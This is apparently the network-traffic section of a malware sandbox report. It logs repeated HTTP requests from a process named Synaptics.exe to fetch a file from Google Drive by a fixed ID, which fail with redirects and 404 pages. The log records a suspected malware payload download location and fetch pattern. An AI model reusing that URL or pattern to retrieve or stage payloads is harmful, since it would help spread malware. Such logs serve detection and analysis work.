                                                                                                                X-GUploader-UploadID: AFiumC4K3LrapuNXSSyTEsokEvIZ9CPckEYgW54fjyxpp_kwXN7gFp2uMuz3rCp-fRcNF8-kkEuBD7k
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:26 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-anoBirZ90kCUANZmbJm-fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:26 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:26 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 4f 46 45 41 74 2d 50 79 4a 44 76 53 4e 51 30 32 65 45 35 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="jOFEAt-PyJDvSNQ02eE5Cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:26 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                60192.168.2.759872142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:26 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:27 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6EQYHYMUZBKYpyCKfeosMOww0EZI28RzcqalhVFwrPzwI5R6WnfuaaH7vDzbbD7-0U
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-39x7-JdhmhN0Zs_9_Eu3ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:27 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                2024-12-30 09:58:27 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 51 56 71 6f 38 68 54 50 46 6a 4a 43 6d 78 69 6d 6f 4d 5f 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                Data Ascii: t Found)!!1</title><style nonce="vQVqo8hTPFjJCmximoM_fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                2024-12-30 09:58:27 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                61192.168.2.759878216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ddWK2_fVp6It8RhQxMPV6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                62192.168.2.759879216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:27 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:27 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ulmZLAyUQST1f5-DkkVbpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                63192.168.2.759880142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:27 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:27 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC7SUMq9-O_oN1hcpt_-O17tpLTFeK0b2GEzEpVwaJDJ079IQbnN1qXOf5G7LRMNS0iBjiaP_yM
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rjUY-6Z4irFyqqbnBj_uhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:27 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:27 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 4f 6b 36 62 74 79 63 61 41 48 6d 6e 63 6f 46 33 6a 6c 6d 6a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="2Ok6btycaAHmncoF3jlmjA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:27 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                64192.168.2.759884142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6OAnisgPUgwtHfGedXVtwueot4s7kDeXM2iAh4_zEdsKbtD2mdb-Zn0gmCrupcNerzpDvft08
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:28 GMT
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-TKg9UAIDFxI15YZ_8Uh6Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 39 35 75 61 78 59 76 61 5a 6e 54 71 62 4c 62 6a 62 44 72 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="w95uaxYvaZnTqbLbjbDr2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                65192.168.2.759889216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:28 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:28 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-FvQv0O4xlOEaInnB_B5sfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
